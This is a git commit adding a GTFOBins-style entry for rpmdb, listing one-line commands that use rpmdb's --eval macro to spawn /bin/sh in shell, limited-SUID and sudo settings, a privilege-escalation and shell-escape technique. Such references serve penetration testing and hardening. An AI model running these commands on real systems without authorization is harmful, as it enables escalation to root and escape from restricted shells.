Add rpmdb

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Mateus 2022-06-28 16:15:58 -03:00 committed by GitHub
parent 61f79ef933
commit 0a60c6239e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

9
_gtfobins/rpmdb.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
shell:
- code: rpmdb --eval '%(/bin/sh 1>&2)'
limited-suid:
- code: ./rpmdb --eval '%(/bin/sh 1>&2)'
sudo:
- code: sudo rpmdb --eval '%(/bin/sh 1>&2)'
---